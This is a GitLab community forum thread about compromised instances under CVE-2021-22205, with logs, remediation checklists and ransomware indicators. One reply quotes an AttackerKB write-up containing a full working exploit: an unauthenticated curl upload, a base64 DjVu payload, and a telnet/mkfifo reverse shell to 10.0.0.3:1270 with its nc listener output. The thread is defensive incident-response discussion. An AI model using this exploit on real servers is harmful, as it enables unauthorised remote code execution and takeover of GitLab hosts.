It would be much appreciated if you can guide more in details through this or show me how to stop the cripts/ atleast the ones you found?
Since they can do rce, then they probably can do privilege escalation as well as it is easier to get the inital foothold. Set up firewall or put it under something like VPN will be safer.
(I wrote this when @ralfaro’s post first appeared, but for some reason I didn’t send it) I think it’s good that GitLab published information like this. I’m less impressed that it happens so long after patched versions came out. The vulnerability was not present in 13.11 that came out in April
A malicious actor exploiting CVE-2021-22205 may leave scripts or crontab entries that persist even after the GitLab instance was patched or upgraded.
If you’re running a patched or updated GitLab version and there’s evidence your system is still compromised, consider backing up your GitLab data and restoring it on a fresh server.
In my case, I patched to the 14.4 yesterday and Workhorse is still printing activities. No system root crontab was accessible to them, but they tried. And here’s the thing, I think they somehow programmed jobs like a legit project but Gitlab’s interface doesn’t detect them, just Workhorse.
Here is the latest exiftool print:
{"correlation_id":"01FM1SSKGHKV156MYXGANN64W1","filename":"l.jpg","imageType":1,"level":"info","msg":"invalid content type, not running exiftool","time":"2021-11-09T07:32:27Z"}
{"client_mode":"local","copied_bytes":767,"correlation_id":"01FM1SSKGHKV156MYXGANN64W1","is_local":true,"is_multipart":false,"is_remote":false,"level":"info","local_temp_path":"/opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp","msg":"saved file","remote_id":"","temp_file_prefix":"l.jpg","time":"2021-11-09T07:32:27Z"}
{"content_type":"text/html; charset=utf-8","correlation_id":"01FM1SSKGHKV156MYXGANN64W1","duration_ms":43,"host":"[MY IP ADDRESS],"level":"info","method":"POST","msg":"access","proto":"HTTP/1.1","referrer":"","remote_addr":"[TARGET IP ADDRESS]","remote_ip":"[TARGET IP ADDRESS]","route":"","status":404,"system":"http","time":"2021-11-09T07:32:27Z","ttfb_ms":40,"uri":"/9y38mzr4pcus5x62","user_agent":"python-requests/2.26.0","written_bytes":3108}
As you can see, the jpg files were located at /opt/gitlab/embedded/service/gitlab-rails/public/uploads/tmp. Now that I deleted it, the POST attempts throw 204 messages, but the script is still running. Any tips for me?
I just patched our system because it was also compromised. I see a few admin users were created which I will delete. But I also see some access tokens that look to be recently added under the root login. See attached screenshot. I was going to remove them, but I want to be sure it’s not supposed to be there?
Thanks!
-Chris
Hello,
I’m currently facing a similar problem, anyone knows if this vulnerability is fixed on GitLab CE14.4.0-ce.0 ?
Thank you.
Somehow, I feel that GitLab should have been more alerting with this and gathered information on how to clean the instance that was exploited.
I got three users added 1/11 as admin and also 3 api tokens created under my admin account that I revoked.
Ive been running gitlab in a docker instance, how does it work with uploaded files, are they deleted when i shutdown and upgrade to the latest version or do I need to manually remove some uploaded images now?
Also, another thing I dont quite get with this exploit, how is it possible that someone who doesnt have a account on my gitlab instance which is closed for signups can upload image files without being logged in?
Could you let me know the logs lications
I found this helpful in this circumstance.
See below and or got to source here: Attackerkb source
Attack Path & Exploit
The confusion around the privilege required to exploit this vulnerability is odd. Unauthenticated and remote users have been and still are able to reach execution of ExifTool via GitLab by design . Specifically HandleFileUploads
in uploads.go is called from a couple of PreAuthorizeHandler
contexts allowing the HandleFileUploads
logic, which calls down to rewrite.go
and exif.go
, to execute before authentication.
The fall-out of this design decision is interesting in that an attacker needs none of the following:
-
Authentication
-
A CSRF token
-
A valid HTTP endpoint
As such, the following curl
command is sufficient to reach, and exploit, ExifTool:
curl -v -F ‘file=@echo_vakzz.jpg’ http://10.0.0.8/$(openssl rand -hex 8)
In the example above, I reference echo_vakzz.jpg
which is the original exploit provided by @wcbowling in their HackerOne disclosure to GitLab. The file is a DjVu image that tricks ExifTool into calling eval
on user provided text embedded in the image. Technically speaking, this is an entirely separate issue in ExifTool. @wcbowling provides an excellent explanation here.
But for the purpose of GitLab exploitation, now that we know how easy it is to reach ExifTool, it’s only important to know how to generate a payload. A very simple method was posted on the OSS-Security mailing list by Jakub Wilk back in May, but it is character-limiting. So here is a reverse shell that reaches out to 10.0.0.3:1270, made by building off of @wcbowling’s original exploit.
albinolobster@ubuntu:~$ echo -e “QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=” | base64 -d > lol.jpg albinolobster@ubuntu:~$ echo -n ‘TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF’ >> lol.jpg albinolobster@ubuntu:~$ echo -n “fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==” | base64 -d >> lol.jpg
We can substitute the generated lol.jpg
into the curl command like so:
albinolobster@ubuntu:~/Downloads$ curl -v -F ‘file=@lol.jpg’ http://10.0.0.7/$(openssl rand -hex 8) * Trying 10.0.0.7… * Connected to 10.0.0.7 (10.0.0.7) port 80 (#0) > POST /e7c6305189bc5bd5 HTTP/1.1 > Host: 10.0.0.7 > User-Agent: curl/7.47.0 > Accept: / > Content-Length: 912 > Expect: 100-continue > Content-Type: multipart/form-data; boundary=------------------------ae83551d0544c303 > < HTTP/1.1 100 Continue
The resulting reverse shell looks like the following:
albinolobster@ubuntu:~$ nc -lnvp 1270 Listening on [0.0.0.0] (family 0, port 1270) Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport 34836) whoami git id uid=998(git) gid=998(git) groups=998(git)
Ah, thanks. I have tested that 13.0.14 was affected by this but version 13.12.8 has amended this. It’s a bit scary as ExifTool was used everywhere. I hope Gitlab team has filled all the holes.
If this RCE vulnerability was exploited on your instance, it’s possible that abuse or malicious user access to the system may persist even after upgrading or patching GitLab.
Unfortunately, there is no one-size-fits-all solution or comprehensive checklist one can use to completely secure a server that has been compromised. GitLab recommends following your organization’s established incident response plan whenever possible.
The suggestions below may help mitigate the threat of further abuse or a malicious actor having persistent access, but this list is not comprehensive or exhaustive.
GitLab-specific:
- Audit user accounts, delete suspicious accounts created in the past several months
- Review the GitLab logs and server logs for suspicious activity, such as activities taken by any user accounts detected in the user audit.
- Rotate admin / privileged API tokens
- Rotate sensitive credentials/variables/tokens/secrets (located in instance configuration, database, CI pipelines, or elsewhere)
- Check for suspicious files (particularly those owned by
git
user and/or located intmp
directories) - Migrate GitLab data to a new server
- Check for crontab / cronjob entries added by the
git
user - Upgrade to the latest version and adopt a plan to upgrade after every security patch release
- Review project source code for suspicious modifications
- Check for newly added or modified GitLab Runners
- Check for suspicious webhooks or git hooks
Additionally, the suggestions below are common steps taken in incident response plans when servers are compromised by malicious actors.
- Look for unrecognized background processes
- Review network logs for uncommon traffic
- Check for open ports on the system
- Establish network monitoring and network-level controls
- Restrict access to the instance at the network level (restrict access to authorized users/machines only)
- Decommission servers that were compromised
- Migrate data on the compromised server to a new server with all the latest security patches
This is an important check to do, it looks like we’ve see evidence of this vector in active use. It’d be a way to re-establish control of the system.
Check in every repo for custom hooks in /var/opt/gitlab/git-data/repositories/@hashed/*/*/*.git/custom_hooks/*
(and / or the relevant path for Git repos still using legacy storage)
Check also for any added server hooks.
To find out where these are put on from-source and Omnibus installs, and also where repository hooks are stored (by default) on a from-source install, check out the custom hooks docs.
Additionally, please consider subscribing to our security alerts via the Communication Preference Center | GitLab so you are emailed when GitLab publishes a security release.
We at AWS had all our AMIs
of GitLab inspected and - if needed - upgraded.
Another indicator was shared by @antondollmaier: Presence __$$RECOVERY_README$$__.html
files in Git repos, plus POST /uploads/user HTTP/1.0
events in logs. Thank you!
We’ve seen recent reports of unpatched, publicly accessible GitLab instances having Git repository data encrypted by a ransomware attack.
Indicators of compromise associated with this may include:
- Users unable to clone or push any projects
- errors when trying to view repositories in the UI
- suspicious files in the Git repo directories on the server (eg. files ending in
.locked
or.html
)
If you find that data has been encrypted by a ransomware attack, industry-standard best practice is to:
- follow your organizations’ security incident response and disaster recovery plan
- restore to last known working backup (one taken before ransomware attack)
To help mitigate the threat of abuse and attacks moving forward:
- Restrict access to the GitLab instance/server at the network layer
- Patch the instance immediately after restoring from backup
- Plan an upgrade to the latest GitLab version as soon as possible
- Subscribe to security alerts via email in the GitLab Communication Preference Center or subscribe to our Security Releases RSS feed and adopt a plan to upgrade after every security release
- Take regular backups of GitLab data
- Review this list of suggestions and best practices for securing a compromised server
Guys, goddamnit, do something with your idea of “security”.
You should never ever process any files from an unauthenticated entity if the instance was set to private mode. Why would you comb out random files supplied from random internet address with random golang scripts invoking random 3rd party utils? Have you gone insane or what?
Here’s another thing, again, absolutely unexpected from admin perspective. Our instance has Restricted visibility levels setting configured with Public checked. One might expect that would fence off unauthenticated access from the entire gitlab install. But that’s not the case — see https://bit.ly/3A3CokF . Complete repo read access is possible! This is crazy.
There should be a way to lock the instance down from anyone unauthorized.
Third thing is /etc/gitlab/gitlab-secrets.json rotation. What are we supposed to do with them on a compromised instance? Those tokens need a way to be rotated. There currently is none.
I agree with everything in your post. We still have security alerts from our antivirus because of this vulnerability even though our instance is not vulnerable anymore.
I don’t get why gitlab still process those files from unauthenticated entities. It’s a major problem that should be patched asap but it seems like nobody cares.
@kulisse Gitlab has been patched. Since your installation was obviously infected, you need to clean it up - maybe the gists still exist on your install and are so being found, or files on the server itself that are found and scanned.
Usually when a server is compromised, you should really start from zero and restore. Otherwise you need to make sure it has been completely cleaned up. That is most likely why you still have issues.